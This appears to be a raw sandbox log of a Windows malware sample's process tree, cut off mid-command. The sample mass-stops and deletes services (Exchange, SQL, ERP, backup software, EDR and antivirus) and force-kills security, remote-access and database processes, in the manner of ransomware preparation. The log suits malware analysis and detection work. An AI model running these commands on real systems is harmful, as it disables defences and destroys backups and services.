C:\Windows\SysWOW64\net.exenet stop Mysoft.SchedulingService5⤵PID:2416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Mysoft.SchedulingService6⤵PID:1668
-
-
-
C:\Windows\SysWOW64\net.exenet stop AgentX5⤵PID:2336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AgentX6⤵PID:2424
-
-
-
C:\Windows\SysWOW64\net.exenet stop SentinelKeysServer5⤵PID:212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SentinelKeysServer6⤵PID:2236
-
-
-
C:\Windows\SysWOW64\net.exenet stop DGPNPSEV5⤵PID:2784
-
-
C:\Windows\SysWOW64\net.exenet stop TurboCRM705⤵PID:2104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TurboCRM706⤵PID:2296
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFSysService5⤵PID:2348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFSysService6⤵PID:2400
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8DispatchService5⤵PID:2324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8DispatchService6⤵PID:2560
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFOTPService5⤵PID:1568
-
-
C:\Windows\SysWOW64\net.exenet stop U8EISService5⤵PID:2328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8EISService6⤵PID:2972
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8EncryptService5⤵PID:3008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8EncryptService6⤵PID:2272
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8GCService5⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8GCService6⤵PID:2780
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8KeyManagePool5⤵PID:2932
-
-
C:\Windows\SysWOW64\net.exenet stop U8MPool5⤵PID:924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8MPool6⤵PID:1388
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SCMPool5⤵PID:2216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SCMPool6⤵PID:3028
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SLReportService5⤵PID:2140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SLReportService6⤵PID:2280
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8TaskService5⤵PID:2468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8TaskService6⤵PID:1628
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8WebPool5⤵PID:2924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WebPool6⤵PID:2220
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFAllNet5⤵PID:2228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFAllNet6⤵PID:1824
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFReportService5⤵PID:2260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFReportService6⤵PID:2736
-
-
-
C:\Windows\SysWOW64\net.exenet stop UTUService5⤵PID:2120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UTUService6⤵PID:968
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:524 -
C:\Windows\SysWOW64\net.exenet stop U8WorkerService15⤵PID:1948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService16⤵PID:1728
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService25⤵PID:1324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService26⤵PID:1568
-
-
-
C:\Windows\SysWOW64\net.exenet stop "memcached Server"5⤵PID:1732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "memcached Server"6⤵PID:684
-
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.45⤵PID:2100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.46⤵PID:2148
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFIDAWebService5⤵PID:2252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFIDAWebService6⤵PID:2272
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSComplianceAudit5⤵PID:2304
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology5⤵PID:2384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology6⤵PID:2400
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate5⤵PID:2468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate6⤵PID:2536
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeCompliance5⤵PID:2864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeCompliance6⤵PID:3032
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDagMgmt5⤵PID:2204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDagMgmt6⤵PID:2284
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDelivery5⤵PID:1264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDelivery6⤵PID:2976
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDiagnostics5⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDiagnostics6⤵PID:684
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync5⤵PID:2212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync6⤵PID:2508
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFastSearch5⤵PID:2556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFastSearch6⤵PID:1780
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFrontEndTransport5⤵PID:2056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFrontEndTransport6⤵PID:976
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHM5⤵PID:2104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM6⤵PID:2924
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL20085⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL20086⤵PID:2636
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHMRecovery5⤵PID:2548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHMRecovery6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap45⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap46⤵PID:1636
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIMAP4BE5⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIMAP4BE6⤵PID:2028
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS6⤵PID:588
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxAssistants5⤵PID:2320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxAssistants6⤵PID:3040
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication5⤵PID:2572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication6⤵PID:3036
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeNotificationsBroker5⤵PID:2968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeNotificationsBroker6⤵PID:2144
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePop35⤵PID:1864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePop36⤵PID:2636
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePOP3BE5⤵PID:2316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePOP3BE6⤵PID:976
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRepl5⤵PID:1104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRepl6⤵PID:3028
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRPC5⤵PID:1764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRPC6⤵PID:2508
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeServiceHost5⤵PID:1732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeServiceHost6⤵PID:284
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSubmission5⤵PID:2240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSubmission6⤵PID:2644
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeTransport5⤵PID:2316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeTransport6⤵PID:968
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeThrottling5⤵PID:720
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeTransportLogSearch5⤵PID:2556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeTransportLogSearch6⤵PID:2228
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeUM5⤵PID:2856
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeUM6⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeUMCR5⤵PID:2776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeUMCR6⤵PID:2328
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL5_OA5⤵PID:2648
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL5_OA6⤵PID:3036
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""4⤵PID:1932
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService5⤵PID:1632
-
-
C:\Windows\SysWOW64\sc.exesc delete REPLICA5⤵PID:1568
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCATS5⤵PID:212
-
-
C:\Windows\SysWOW64\sc.exesc delete RtcQms5⤵PID:2228
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCAVMCU5⤵PID:2068
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCMEETINGMCU5⤵PID:2504
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCIMMCU5⤵PID:2728
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCDATAMCU5⤵PID:2968
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCCDR5⤵PID:1864
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectEventService165⤵PID:2508
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectQueueService165⤵PID:2876
-
-
C:\Windows\SysWOW64\sc.exesc delete SPAdminV45⤵PID:1120
-
-
C:\Windows\SysWOW64\sc.exesc delete SPSearchHostController5⤵PID:2128
-
-
C:\Windows\SysWOW64\sc.exesc delete SPTimerV45⤵PID:2304
-
-
C:\Windows\SysWOW64\sc.exesc delete SPTraceV45⤵PID:2604
-
-
C:\Windows\SysWOW64\sc.exesc delete OSearch165⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectCalcService165⤵PID:2844
-
-
C:\Windows\SysWOW64\sc.exesc delete c2wts5⤵PID:1640
-
-
C:\Windows\SysWOW64\sc.exesc delete AppFabricCachingService5⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc delete ADWS5⤵PID:2316
-
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoard575⤵PID:2280
-
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoardRCService575⤵PID:2372
-
-
C:\Windows\SysWOW64\sc.exesc delete vsvnjobsvc5⤵PID:3052
-
-
C:\Windows\SysWOW64\sc.exesc delete VisualSVNServer5⤵PID:3068
-
-
C:\Windows\SysWOW64\sc.exesc delete "FlexNet Licensing Service 64"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\SysWOW64\sc.exesc delete BestSyncSvc5⤵PID:556
-
-
C:\Windows\SysWOW64\sc.exesc delete LPManager5⤵PID:2328
-
-
C:\Windows\SysWOW64\sc.exesc delete MediatekRegistryWriter5⤵PID:2544
-
-
C:\Windows\SysWOW64\sc.exesc delete RaAutoInstSrv_RT28705⤵PID:2416
-
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup105⤵PID:2168
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLANYs_sem55⤵PID:2208
-
-
C:\Windows\SysWOW64\sc.exesc delete CASLicenceServer5⤵PID:2276
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLService5⤵PID:2656
-
-
C:\Windows\SysWOW64\sc.exesc delete semwebsrv5⤵PID:2108
-
-
C:\Windows\SysWOW64\sc.exesc delete TbossSystem5⤵PID:1388
-
-
C:\Windows\SysWOW64\sc.exesc delete ErpEnvSvc5⤵PID:2572
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.DispatchService5⤵PID:2992
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.UpdateService5⤵PID:2280
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Config.WindowsService5⤵PID:2164
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.DataCenterService5⤵PID:2364
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.SchedulingService5⤵PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Setup.InstallService5⤵PID:2916
-
-
C:\Windows\SysWOW64\sc.exesc delete MysoftUpdate5⤵PID:2932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8KeyManagePool6⤵PID:3016
-
-
-
C:\Windows\SysWOW64\sc.exesc delete edr_monitor5⤵PID:1780
-
-
C:\Windows\SysWOW64\sc.exesc delete savsvc5⤵PID:2944
-
-
C:\Windows\SysWOW64\sc.exesc delete abs_deployer5⤵PID:2120
-
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxMonitorService5⤵PID:1928
-
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxService5⤵PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc delete CloudExchangeService5⤵PID:1268
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService2"5⤵PID:2332
-
-
C:\Windows\SysWOW64\sc.exesc delete CIS5⤵PID:2304
-
-
C:\Windows\SysWOW64\sc.exesc delete EASService5⤵PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc delete KICkSvr5⤵PID:2536
-
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"5⤵PID:1580
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SmsSrv5⤵PID:2784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DGPNPSEV6⤵PID:2860
-
-
-
C:\Windows\SysWOW64\sc.exesc delete OfficeClearCache5⤵PID:3008
-
-
C:\Windows\SysWOW64\sc.exesc delete TurboCRM705⤵PID:2276
-
-
C:\Windows\SysWOW64\sc.exesc delete U8DispatchService5⤵PID:2636
-
-
C:\Windows\SysWOW64\sc.exesc delete U8EISService5⤵PID:2848
-
-
C:\Windows\SysWOW64\sc.exesc delete U8EncryptService5⤵PID:684
-
-
C:\Windows\SysWOW64\sc.exesc delete U8GCService5⤵PID:2136
-
-
C:\Windows\SysWOW64\sc.exesc delete U8KeyManagePool5⤵PID:2264
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8MPool"5⤵PID:556
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SCMPool5⤵PID:2304
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SLReportService5⤵PID:2956
-
-
C:\Windows\SysWOW64\sc.exesc delete U8TaskService5⤵PID:2460
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WebPool"5⤵PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc delete UFAllNet5⤵PID:2180
-
-
C:\Windows\SysWOW64\sc.exesc delete UFReportService5⤵PID:2656
-
-
C:\Windows\SysWOW64\sc.exesc delete UTUService5⤵PID:2308
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService1"5⤵PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"4⤵PID:2036
-
C:\Windows\SysWOW64\sc.exesc delete "UWS LoPriv Services"5⤵PID:232
-
-
C:\Windows\SysWOW64\sc.exesc delete ftnlsv35⤵PID:916
-
-
C:\Windows\SysWOW64\sc.exesc delete FxService5⤵PID:1764
-
-
C:\Windows\SysWOW64\sc.exesc delete ftnlses35⤵PID:1980
-
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdwks5⤵PID:2208
-
-
C:\Windows\SysWOW64\sc.exesc delete "UtilDev Web Server Pro"5⤵PID:2108
-
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdsrv5⤵PID:2376
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client Guard"5⤵PID:2596
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client"5⤵PID:2832
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE FileTranS"5⤵PID:3024
-
-
C:\Windows\SysWOW64\sc.exesc delete wwbizsrv5⤵PID:2208
-
-
C:\Windows\SysWOW64\sc.exesc delete qemu-ga5⤵PID:2436
-
-
C:\Windows\SysWOW64\sc.exesc delete AlibabaProtect5⤵PID:2500
-
-
C:\Windows\SysWOW64\sc.exesc delete ZTEVdservice5⤵PID:208
-
-
C:\Windows\SysWOW64\sc.exesc delete kbasesrv5⤵PID:1880
-
-
C:\Windows\SysWOW64\sc.exesc delete MMRHookService5⤵PID:1764
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL5⤵PID:2392
-
-
C:\Windows\SysWOW64\sc.exesc delete IpOverUsbSvc5⤵PID:2252
-
-
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1005⤵PID:1396
-
-
C:\Windows\SysWOW64\sc.exesc delete KuaiYunTools5⤵PID:2584
-
-
C:\Windows\SysWOW64\sc.exesc delete KMSELDI5⤵PID:2480
-
-
C:\Windows\SysWOW64\sc.exesc delete btPanel5⤵PID:2660
-
-
C:\Windows\SysWOW64\sc.exesc delete Protect_2345Explorer5⤵PID:2108
-
-
C:\Windows\SysWOW64\sc.exesc delete 2345PicSvc5⤵PID:2156
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-agent5⤵PID:2180
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-server5⤵PID:1272
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-worker5⤵PID:2936
-
-
C:\Windows\SysWOW64\sc.exesc delete QQCertificateService5⤵PID:1640
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleRemExecService5⤵PID:1880
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDaemon5⤵PID:1480
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSUserSvr5⤵PID:2564
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDownSvr5⤵PID:2144
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSStorageSvr5⤵PID:1396
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDataProcSvr5⤵PID:2928
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSGatewaySvr5⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSMediaSvr5⤵PID:2972
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSLoginSvr5⤵PID:1580
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSTomcat65⤵
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSMysqld5⤵PID:1632
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSFtpd5⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc delete "Zabbix Agent"5⤵PID:2128
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentAccelerator5⤵PID:2112
-
-
C:\Windows\SysWOW64\sc.exesc delete bedbg5⤵PID:2236
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecDeviceMediaService5⤵PID:2740
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecRPCService5⤵PID:2560
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentBrowser5⤵PID:2976
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecManagementService5⤵PID:2192
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecJobEngine5⤵PID:2880
-
-
C:\Windows\SysWOW64\sc.exesc delete MDM5⤵PID:2796
-
-
C:\Windows\SysWOW64\sc.exesc delete Gailun_Downloader5⤵PID:2128
-
-
C:\Windows\SysWOW64\sc.exesc delete TxQBService5⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc delete RemoteAssistService5⤵PID:1476
-
-
C:\Windows\SysWOW64\sc.exesc delete YunService5⤵PID:2924
-
-
C:\Windows\SysWOW64\sc.exesc delete Serv-U5⤵PID:1936
-
-
C:\Windows\SysWOW64\sc.exesc delete "EasyFZS Server"5⤵PID:2100
-
-
C:\Windows\SysWOW64\sc.exesc delete "Rpc Monitor"5⤵PID:2660
-
-
C:\Windows\SysWOW64\sc.exesc delete OpenFastAssist5⤵PID:2956
-
-
C:\Windows\SysWOW64\sc.exesc delete "Nuo Update Monitor"5⤵PID:2948
-
-
C:\Windows\SysWOW64\sc.exesc delete "Daemon Service"5⤵PID:2380
-
-
C:\Windows\SysWOW64\sc.exesc delete asComSvc5⤵PID:2052
-
-
C:\Windows\SysWOW64\sc.exesc delete OfficeUpdateService5⤵PID:1396
-
-
C:\Windows\SysWOW64\sc.exesc delete RtcSrv5⤵PID:2124
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCASMCU5⤵PID:2272
-
-
C:\Windows\SysWOW64\sc.exesc delete FTA5⤵PID:2080
-
-
C:\Windows\SysWOW64\sc.exesc delete MASTER5⤵PID:3056
-
-
C:\Windows\SysWOW64\sc.exesc delete NscAuthService5⤵PID:1632
-
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMUnzipService5⤵PID:2292
-
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService$maintenance5⤵PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & 